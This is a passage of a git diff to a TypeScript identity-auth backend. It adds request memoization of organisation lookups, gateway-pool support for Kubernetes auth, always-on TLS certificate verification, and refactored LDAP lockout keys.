= await request.get(`https://www.googleapis.com/service_accounts/v1/metadata/x509/${encodeURIComponent(sub)}`); const publicKey = data[decodedJwt.header.kid]; diff --git a/backend/src/services/identity-gcp-auth/identity-gcp-auth-service.ts b/backend/src/services/identity-gcp-auth/identity-gcp-auth-service.ts index ea816577972..d30176cbd66 100644 --- a/backend/src/services/identity-gcp-auth/identity-gcp-auth-service.ts +++ b/backend/src/services/identity-gcp-auth/identity-gcp-auth-service.ts @@ -20,7 +20,9 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -75,7 +77,9 @@ export const identityGcpAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -591,7 +595,10 @@ export const identityGcpAuthServiceFactory = ({ actorAuthMethod, actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( 
shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-jwt-auth/identity-jwt-auth-service.ts b/backend/src/services/identity-jwt-auth/identity-jwt-auth-service.ts index 7ac6363fee4..69ddbedde7e 100644 --- a/backend/src/services/identity-jwt-auth/identity-jwt-auth-service.ts +++ b/backend/src/services/identity-jwt-auth/identity-jwt-auth-service.ts @@ -29,7 +29,9 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { getValueByDot } from "@app/lib/template/dot-access"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -90,7 +92,9 @@ export const identityJwtAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -126,7 +130,9 @@ export const identityJwtAuthServiceFactory = ({ cipherTextBlob: identityJwtAuth.encryptedJwksCaCert }).toString(); - const requestAgent = new https.Agent({ ca: decryptedJwksCaCert, rejectUnauthorized: !!decryptedJwksCaCert }); + const requestAgent = decryptedJwksCaCert + ? 
new https.Agent({ ca: decryptedJwksCaCert, rejectUnauthorized: true }) + : undefined; client = new JwksClient({ jwksUri: identityJwtAuth.jwksUrl, requestAgent @@ -790,7 +796,10 @@ export const identityJwtAuthServiceFactory = ({ actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-dal.ts b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-dal.ts index f1ba2e1dff0..ef1149a9096 100644 --- a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-dal.ts +++ b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-dal.ts @@ -31,5 +31,27 @@ export const identityKubernetesAuthDALFactory = (db: TDbClient) => { return parseInt(String(result?.count || "0"), 10); }; - return { ...kubernetesAuthOrm, findByGatewayId, countByGatewayId }; + const findByGatewayPoolId = async (gatewayPoolId: string, tx?: Knex) => { + const docs = await (tx || db.replicaNode())(TableName.IdentityKubernetesAuth) + .leftJoin(TableName.Identity, `${TableName.IdentityKubernetesAuth}.identityId`, `${TableName.Identity}.id`) + .where(`${TableName.IdentityKubernetesAuth}.gatewayPoolId`, gatewayPoolId) + .select( + db.ref("id").withSchema(TableName.IdentityKubernetesAuth), + db.ref("identityId").withSchema(TableName.IdentityKubernetesAuth), + db.ref("name").withSchema(TableName.Identity).as("identityName") + ); + + return docs; + }; + + const countByGatewayPoolId = async (gatewayPoolId: string, tx?: Knex) => { + const result = await (tx || db.replicaNode())(TableName.IdentityKubernetesAuth) + 
.where(`${TableName.IdentityKubernetesAuth}.gatewayPoolId`, gatewayPoolId) + .count("id") + .first(); + + return parseInt(String(result?.count || "0"), 10); + }; + + return { ...kubernetesAuthOrm, findByGatewayId, countByGatewayId, findByGatewayPoolId, countByGatewayPoolId }; }; diff --git a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-service.ts b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-service.ts index dac0274e09d..f249a3fafe4 100644 --- a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-service.ts +++ b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-service.ts @@ -1,6 +1,6 @@ import { ForbiddenError, subject } from "@casl/ability"; import { requestContext } from "@fastify/request-context"; -import axios, { AxiosError, AxiosRequestConfig, AxiosResponse } from "axios"; +import { AxiosError, AxiosRequestConfig, AxiosResponse } from "axios"; import https from "https"; import picomatch from "picomatch"; import RE2 from "re2"; @@ -14,11 +14,14 @@ import { } from "@app/db/schemas"; import { TGatewayDALFactory } from "@app/ee/services/gateway/gateway-dal"; import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service"; +import { TGatewayPoolDALFactory } from "@app/ee/services/gateway-pool/gateway-pool-dal"; +import { TGatewayPoolServiceFactory } from "@app/ee/services/gateway-pool/gateway-pool-service"; import { TGatewayV2DALFactory } from "@app/ee/services/gateway-v2/gateway-v2-dal"; import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { TLicenseServiceFactory } from "@app/ee/services/license/license-service"; import { OrgPermissionGatewayActions, + OrgPermissionGatewayPoolActions, OrgPermissionIdentityActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission"; @@ -42,7 +45,9 @@ import { GatewayHttpProxyActions, GatewayProxyProtocol, withGatewayProxy } from import { 
withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -87,6 +92,11 @@ type TIdentityKubernetesAuthServiceFactoryDep = { gatewayV2Service: TGatewayV2ServiceFactory; gatewayDAL: Pick; gatewayV2DAL: Pick; + gatewayPoolService: Pick< + TGatewayPoolServiceFactory, + "getPlatformConnectionDetailsByPoolId" | "pickRandomHealthyGateway" + >; + gatewayPoolDAL: Pick; orgDAL: Pick; }; @@ -106,11 +116,14 @@ export const identityKubernetesAuthServiceFactory = ({ gatewayDAL, gatewayV2DAL, kmsService, + gatewayPoolService, + gatewayPoolDAL, orgDAL }: TIdentityKubernetesAuthServiceFactoryDep) => { const $gatewayProxyWrapper = async ( inputs: { - gatewayId: string; + gatewayId?: string; + gatewayPoolId?: string; targetHost?: string; targetPort?: number; caCert?: string; @@ -118,18 +131,25 @@ export const identityKubernetesAuthServiceFactory = ({ }, gatewayCallback: (host: string, port: number, httpsAgent?: https.Agent) => Promise ): Promise => { - const gatewayV2ConnectionDetails = await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ - gatewayId: inputs.gatewayId, - targetHost: inputs.targetHost ?? GATEWAY_AUTH_DEFAULT_HOST, - targetPort: inputs.targetPort ?? 443 - }); + const gatewayV2ConnectionDetails = inputs.gatewayPoolId + ? await gatewayPoolService.getPlatformConnectionDetailsByPoolId({ + poolId: inputs.gatewayPoolId, + targetHost: inputs.targetHost ?? GATEWAY_AUTH_DEFAULT_HOST, + targetPort: inputs.targetPort ?? 
443 + }) + : await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId: inputs.gatewayId!, + targetHost: inputs.targetHost ?? GATEWAY_AUTH_DEFAULT_HOST, + targetPort: inputs.targetPort ?? 443 + }); if (gatewayV2ConnectionDetails) { let httpsAgent: https.Agent | undefined; if (!inputs.reviewTokenThroughGateway) { httpsAgent = new https.Agent({ - ca: inputs.caCert, - rejectUnauthorized: Boolean(inputs.caCert) + ca: inputs.caCert || undefined, + rejectUnauthorized: true, + servername: inputs.targetHost }); } @@ -154,7 +174,7 @@ export const identityKubernetesAuthServiceFactory = ({ return callbackResult; } - const relayDetails = await gatewayService.fnGetGatewayClientTlsByGatewayId(inputs.gatewayId); + const relayDetails = await gatewayService.fnGetGatewayClientTlsByGatewayId(inputs.gatewayId!); const callbackResult = await withGatewayProxy( async (port, httpsAgent) => { @@ -174,8 +194,9 @@ export const identityKubernetesAuthServiceFactory = ({ ...(!inputs.reviewTokenThroughGateway ? { httpsAgent: new https.Agent({ - ca: inputs.caCert, - rejectUnauthorized: Boolean(inputs.caCert) + ca: inputs.caCert || undefined, + rejectUnauthorized: true, + servername: inputs.targetHost }) } : {}) @@ -264,7 +285,9 @@ export const identityKubernetesAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -313,7 +336,7 @@ export const identityKubernetesAuthServiceFactory = ({ const baseUrl = port ? 
`${host}:${port}` : host; - const res = await axios + const res = await request .post( `${baseUrl}/apis/authentication.k8s.io/v1/tokenreviews`, { @@ -334,8 +357,8 @@ export const identityKubernetesAuthServiceFactory = ({ signal: AbortSignal.timeout(10000), timeout: 10000, httpsAgent: new https.Agent({ - ca: caCert, - rejectUnauthorized: Boolean(caCert), + ca: caCert || undefined, + rejectUnauthorized: true, servername }) } @@ -388,7 +411,7 @@ export const identityKubernetesAuthServiceFactory = ({ "tokenReviewCallbackThroughGateway: Processing kubernetes token review using gateway" ); - const res = await axios + const res = await request .post( `${host}:${port}/apis/authentication.k8s.io/v1/tokenreviews`, { @@ -437,15 +460,22 @@ export const identityKubernetesAuthServiceFactory = ({ let data: TCreateTokenReviewResponse | undefined; if (identityKubernetesAuth.tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway) { - if (!identityKubernetesAuth.gatewayId && !identityKubernetesAuth.gatewayV2Id) { + if ( + !identityKubernetesAuth.gatewayId && + !identityKubernetesAuth.gatewayV2Id && + !identityKubernetesAuth.gatewayPoolId + ) { throw new BadRequestError({ - message: "Gateway ID is required when token review mode is set to Gateway" + message: "Gateway or Gateway Pool is required when token review mode is set to Gateway" }); } data = await $gatewayProxyWrapper( { - gatewayId: (identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId) as string, + gatewayId: identityKubernetesAuth.gatewayPoolId + ? undefined + : ((identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId) as string), + gatewayPoolId: identityKubernetesAuth.gatewayPoolId ?? undefined, reviewTokenThroughGateway: true }, tokenReviewCallbackThroughGateway @@ -464,18 +494,25 @@ export const identityKubernetesAuthServiceFactory = ({ const [k8sHost, k8sPort] = kubernetesHost.split(":"); - data = - identityKubernetesAuth.gatewayId || identityKubernetesAuth.gatewayV2Id - ? 
await $gatewayProxyWrapper( - { - gatewayId: (identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId) as string, - targetHost: k8sHost, - targetPort: k8sPort ? Number(k8sPort) : 443, - reviewTokenThroughGateway: false - }, - tokenReviewCallbackRaw - ) - : await tokenReviewCallbackRaw(); + const hasGateway = + identityKubernetesAuth.gatewayId || + identityKubernetesAuth.gatewayV2Id || + identityKubernetesAuth.gatewayPoolId; + + data = hasGateway + ? await $gatewayProxyWrapper( + { + gatewayId: identityKubernetesAuth.gatewayPoolId + ? undefined + : ((identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId) as string), + gatewayPoolId: identityKubernetesAuth.gatewayPoolId ?? undefined, + targetHost: k8sHost, + targetPort: k8sPort ? Number(k8sPort) : 443, + reviewTokenThroughGateway: false + }, + tokenReviewCallbackRaw + ) + : await tokenReviewCallbackRaw(); } else { throw new BadRequestError({ message: `Invalid token review mode: ${identityKubernetesAuth.tokenReviewMode}` @@ -705,6 +742,7 @@ export const identityKubernetesAuthServiceFactory = ({ const attachKubernetesAuth = async ({ identityId, gatewayId, + gatewayPoolId, kubernetesHost, caCert, tokenReviewerJwt, @@ -843,6 +881,47 @@ export const identityKubernetesAuthServiceFactory = ({ await validateTokenReviewerPermissions({ gatewayExecutor, tokenReviewerJwt }); } } + } else if (gatewayPoolId) { + if (!plan.gatewayPool) { + throw new BadRequestError({ + message: "Your current plan does not support gateway pools. Please upgrade to an Enterprise plan." 
+ }); + } + + const { permission: orgPermission } = await permissionService.getOrgPermission({ + scope: OrganizationActionScope.Any, + actor, + actorId, + orgId: identityMembershipOrg.scopeOrgId, + actorAuthMethod, + actorOrgId + }); + ForbiddenError.from(orgPermission).throwUnlessCan( + OrgPermissionGatewayPoolActions.AttachGatewayPools, + OrgPermissionSubjects.GatewayPool + ); + + const pool = await gatewayPoolDAL.findById(gatewayPoolId); + if (!pool || pool.orgId !== identityMembershipOrg.scopeOrgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${gatewayPoolId} not found` }); + } + + // Validate connectivity through a random healthy pool member + const validationGateway = await gatewayPoolService.pickRandomHealthyGateway(gatewayPoolId); + if (tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway) { + const gatewayExecutor = $createGatewayValidationRequest(validationGateway.id); + await validateKubernetesHostConnectivity({ gatewayExecutor }); + await validateTokenReviewerPermissions({ gatewayExecutor }); + } else if (tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Api && kubernetesHost) { + const gatewayExecutor = $createGatewayValidationRequest(validationGateway.id, { + kubernetesHost, + caCert: caCert || undefined + }); + await validateKubernetesHostConnectivity({ gatewayExecutor }); + if (tokenReviewerJwt) { + await validateTokenReviewerPermissions({ gatewayExecutor, tokenReviewerJwt }); + } + } } else if (tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Api && kubernetesHost) { logger.info({ kubernetesHost }, "Validating Kubernetes host connectivity for new auth method"); await validateKubernetesHostConnectivity({ @@ -865,6 +944,16 @@ export const identityKubernetesAuthServiceFactory = ({ orgId: identityMembershipOrg.scopeOrgId }); + let resolvedGatewayId: string | null | undefined = null; + let resolvedGatewayV2Id: string | null | undefined = null; + if (!gatewayPoolId && gatewayId) { + if (isGatewayV1) { + 
resolvedGatewayId = gatewayId; + } else { + resolvedGatewayV2Id = gatewayId; + } + } + const identityKubernetesAuth = await identityKubernetesAuthDAL.transaction(async (tx) => { const doc = await identityKubernetesAuthDAL.create( { @@ -877,8 +966,9 @@ export const identityKubernetesAuthServiceFactory = ({ accessTokenMaxTTL, accessTokenTTL, accessTokenNumUsesLimit, - gatewayId: isGatewayV1 ? gatewayId : null, - gatewayV2Id: isGatewayV1 ? null : gatewayId, + gatewayId: resolvedGatewayId, + gatewayV2Id: resolvedGatewayV2Id, + gatewayPoolId: gatewayPoolId ?? null, accessTokenTrustedIps: JSON.stringify(reformattedAccessTokenTrustedIps), encryptedKubernetesTokenReviewerJwt: tokenReviewerJwt ? encryptor({ plainText: Buffer.from(tokenReviewerJwt) }).cipherTextBlob @@ -903,6 +993,7 @@ export const identityKubernetesAuthServiceFactory = ({ allowedNames, allowedAudience, gatewayId, + gatewayPoolId, accessTokenTTL, accessTokenMaxTTL, accessTokenNumUsesLimit, @@ -1019,16 +1110,64 @@ export const identityKubernetesAuthServiceFactory = ({ ); } + // Handle gateway pool permission check + if (gatewayPoolId) { + if (!plan.gatewayPool) { + throw new BadRequestError({ + message: "Your current plan does not support gateway pools. Please upgrade to an Enterprise plan." + }); + } + const { permission: orgPermission } = await permissionService.getOrgPermission({ + scope: OrganizationActionScope.Any, + actor, + actorId, + orgId: identityMembershipOrg.scopeOrgId, + actorAuthMethod, + actorOrgId + }); + ForbiddenError.from(orgPermission).throwUnlessCan( + OrgPermissionGatewayPoolActions.AttachGatewayPools, + OrgPermissionSubjects.GatewayPool + ); + + const pool = await gatewayPoolDAL.findById(gatewayPoolId); + if (!pool || pool.orgId !== identityMembershipOrg.scopeOrgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${gatewayPoolId} not found` }); + } + } + // Strict check to see if gateway ID is undefined. It should update the gateway ID to null if its strictly set to null. 
- const shouldUpdateGatewayId = Boolean(gatewayId !== undefined); - const gatewayIdValue = isGatewayV1 ? gatewayId : null; - const gatewayV2IdValue = isGatewayV1 ? null : gatewayId; + const shouldUpdateGatewayId = Boolean(gatewayId !== undefined || gatewayPoolId !== undefined); + let gatewayIdValue: string | null | undefined = null; + let gatewayV2IdValue: string | null | undefined = null; + if (!gatewayPoolId && gatewayId) { + if (isGatewayV1) { + gatewayIdValue = gatewayId; + } else { + gatewayV2IdValue = gatewayId; + } + } + let gatewayPoolIdValue: string | null | undefined; + if (gatewayPoolId !== undefined) { + gatewayPoolIdValue = gatewayPoolId; + } else if (gatewayId !== undefined) { + gatewayPoolIdValue = null; + } else { + gatewayPoolIdValue = undefined; + } const effectiveTokenReviewMode = tokenReviewMode ?? identityKubernetesAuth.tokenReviewMode; const effectiveKubernetesHost = kubernetesHost !== undefined ? kubernetesHost : identityKubernetesAuth.kubernetesHost; - const effectiveGatewayId = - gatewayId !== undefined ? gatewayId : (identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId); + const effectiveGatewayPoolId = gatewayPoolId !== undefined ? gatewayPoolId : identityKubernetesAuth.gatewayPoolId; + let effectiveGatewayId: string | null | undefined = null; + if (effectiveGatewayPoolId) { + effectiveGatewayId = null; + } else if (gatewayId !== undefined) { + effectiveGatewayId = gatewayId; + } else { + effectiveGatewayId = identityKubernetesAuth.gatewayV2Id ?? identityKubernetesAuth.gatewayId; + } const { encryptor, decryptor } = await kmsService.createCipherPairWithDataKey({ type: KmsDataKey.Organization, @@ -1046,23 +1185,33 @@ export const identityKubernetesAuthServiceFactory = ({ effectiveCaCert = undefined; } - if (effectiveGatewayId) { + let validationGatewayId: string | null = effectiveGatewayId ?? 
null; + if (!validationGatewayId && effectiveGatewayPoolId) { + const picked = await gatewayPoolService.pickRandomHealthyGateway(effectiveGatewayPoolId); + validationGatewayId = picked.id; + } + + if (validationGatewayId) { if (effectiveTokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway) { - const gatewayExecutor = $createGatewayValidationRequest(effectiveGatewayId); + const gatewayExecutor = $createGatewayValidationRequest(validationGatewayId); logger.info( - { gatewayId: effectiveGatewayId }, + { gatewayId: validationGatewayId, gatewayPoolId: effectiveGatewayPoolId }, "Validating gateway connectivity to Kubernetes for auth method update" ); await validateKubernetesHostConnectivity({ gatewayExecutor }); await validateTokenReviewerPermissions({ gatewayExecutor }); } else if (effectiveTokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Api && effectiveKubernetesHost) { - const gatewayExecutor = $createGatewayValidationRequest(effectiveGatewayId, { + const gatewayExecutor = $createGatewayValidationRequest(validationGatewayId, { kubernetesHost: effectiveKubernetesHost, caCert: effectiveCaCert }); logger.info( - { gatewayId: effectiveGatewayId, kubernetesHost: effectiveKubernetesHost }, + { + gatewayId: validationGatewayId, + gatewayPoolId: effectiveGatewayPoolId, + kubernetesHost: effectiveKubernetesHost + }, "Validating Kubernetes connectivity through gateway for auth method update" ); @@ -1101,6 +1250,7 @@ export const identityKubernetesAuthServiceFactory = ({ allowedAudience, gatewayId: shouldUpdateGatewayId ? gatewayIdValue : undefined, gatewayV2Id: shouldUpdateGatewayId ? 
gatewayV2IdValue : undefined, + gatewayPoolId: gatewayPoolIdValue, accessTokenMaxTTL, accessTokenTTL, accessTokenNumUsesLimit, @@ -1281,7 +1431,10 @@ export const identityKubernetesAuthServiceFactory = ({ actorOrgId, scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-types.ts b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-types.ts index 8f06bfd5d33..a64018f6b90 100644 --- a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-types.ts +++ b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-types.ts @@ -21,6 +21,7 @@ export type TAttachKubernetesAuthDTO = { allowedNames: string; allowedAudience: string; gatewayId?: string | null; + gatewayPoolId?: string | null; accessTokenTTL: number; accessTokenMaxTTL: number; accessTokenNumUsesLimit: number; @@ -38,6 +39,7 @@ export type TUpdateKubernetesAuthDTO = { allowedNames?: string; allowedAudience?: string; gatewayId?: string | null; + gatewayPoolId?: string | null; accessTokenTTL?: number; accessTokenMaxTTL?: number; accessTokenNumUsesLimit?: number; diff --git a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-validators.ts b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-validators.ts index 902c5b1b3b6..271fcd4902e 100644 --- a/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-validators.ts +++ b/backend/src/services/identity-kubernetes-auth/identity-kubernetes-auth-validators.ts @@ -53,7 +53,7 @@ export 
const validateKubernetesHostConnectivity = async ({ const httpsAgent = new https.Agent({ ca: caCert || undefined, - rejectUnauthorized: Boolean(caCert) + rejectUnauthorized: true }); await blockLocalAndPrivateIpAddresses(kubernetesHost); @@ -156,7 +156,7 @@ export const validateTokenReviewerPermissions = async ({ const httpsAgent = new https.Agent({ ca: caCert || undefined, - rejectUnauthorized: Boolean(caCert) + rejectUnauthorized: true }); await blockLocalAndPrivateIpAddresses(kubernetesHost); diff --git a/backend/src/services/identity-ldap-auth/identity-ldap-auth-service.ts b/backend/src/services/identity-ldap-auth/identity-ldap-auth-service.ts index 736591c21cc..d5abaaa1331 100644 --- a/backend/src/services/identity-ldap-auth/identity-ldap-auth-service.ts +++ b/backend/src/services/identity-ldap-auth/identity-ldap-auth-service.ts @@ -31,7 +31,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; @@ -171,7 +173,9 @@ export const identityLdapAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -831,7 +835,10 @@ export const identityLdapAuthServiceFactory = ({ 
scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, @@ -870,16 +877,24 @@ export const identityLdapAuthServiceFactory = ({ const identity = await identityDAL.findById(identityId); const orgId = identity?.orgId ?? null; - const LOCKOUT_KEY = `lockout:identity:${identityId}:${IdentityAuthMethod.LDAP_AUTH}:${usernameSlug}`; + const lockoutKey = KeyStorePrefixes.IdentityLockoutState(identityId, IdentityAuthMethod.LDAP_AUTH, usernameSlug); - const lockoutRaw = await keyStore.getItem(LOCKOUT_KEY); + const lockoutRaw = await keyStore.getItem(lockoutKey); let lockout: LockoutObject | undefined; if (lockoutRaw) { lockout = JSON.parse(lockoutRaw) as LockoutObject; } - if (lockout && lockout?.lockedOut) { + const identityLdapAuth = await identityLdapAuthDAL.findOne({ identityId }); + if (!identityLdapAuth) { + throw new UnauthorizedError({ + message: "Invalid credentials", + detail: { reasonCode: "ldap_auth_not_found", identityId, orgId, identityName: identity?.name } + }); + } + + if (lockout && lockout?.lockedOut && identityLdapAuth.lockoutEnabled) { throw new UnauthorizedError({ message: "This identity auth method is temporarily locked, please try again later", detail: { reasonCode: "temporarily_locked", identityId, orgId, identityName: identity?.name } @@ -891,32 +906,24 @@ export const identityLdapAuthServiceFactory = ({ // If auth succeeds, clear any existing lockout if (lockout) { - await keyStore.deleteItem(LOCKOUT_KEY); + await keyStore.deleteItem(lockoutKey); } return result; } catch (error) { // eslint-disable-next-line @typescript-eslint/no-explicit-any, 
@typescript-eslint/no-unsafe-member-access if ((error as any).status === 401 || error instanceof UnauthorizedError) { - const identityLdapAuth = await identityLdapAuthDAL.findOne({ identityId }); - if (!identityLdapAuth) { - throw new UnauthorizedError({ - message: "Invalid credentials", - detail: { reasonCode: "ldap_auth_not_found", identityId, orgId, identityName: identity?.name } - }); - } - if (identityLdapAuth.lockoutEnabled) { let lock: Awaited> | undefined; try { - lock = await keyStore.acquireLock([KeyStorePrefixes.IdentityLockoutLock(LOCKOUT_KEY)], 500, { + lock = await keyStore.acquireLock([KeyStorePrefixes.IdentityLockoutLock(lockoutKey)], 500, { retryCount: 10, retryDelay: 300, retryJitter: 100 }); // Re-fetch the latest lockout data while holding the lock - const lockoutRawNew = await keyStore.getItem(LOCKOUT_KEY); + const lockoutRawNew = await keyStore.getItem(lockoutKey); if (lockoutRawNew) { lockout = JSON.parse(lockoutRawNew) as LockoutObject; } else { @@ -939,7 +946,7 @@ export const identityLdapAuthServiceFactory = ({ } await keyStore.setItemWithExpiry( - LOCKOUT_KEY, + lockoutKey, lockout.lockedOut ? 
identityLdapAuth.lockoutDurationSeconds : identityLdapAuth.lockoutCounterResetSeconds, JSON.stringify(lockout) ); @@ -1016,7 +1023,7 @@ export const identityLdapAuthServiceFactory = ({ } const deleted = await keyStore.deleteItems({ - pattern: `lockout:identity:${identityId}:${IdentityAuthMethod.LDAP_AUTH}:*` + pattern: KeyStorePrefixes.IdentityLockoutStateByMethodPattern(identityId, IdentityAuthMethod.LDAP_AUTH) }); return { deleted, identityId, orgId: identityMembershipOrg.scopeOrgId }; diff --git a/backend/src/services/identity-oci-auth/identity-oci-auth-service.ts b/backend/src/services/identity-oci-auth/identity-oci-auth-service.ts index da5849b1077..c957500fdc2 100644 --- a/backend/src/services/identity-oci-auth/identity-oci-auth-service.ts +++ b/backend/src/services/identity-oci-auth/identity-oci-auth-service.ts @@ -25,7 +25,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -79,7 +81,9 @@ export const identityOciAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -555,7 +559,9 @@ export const identityOciAuthServiceFactory = ({ scope: 
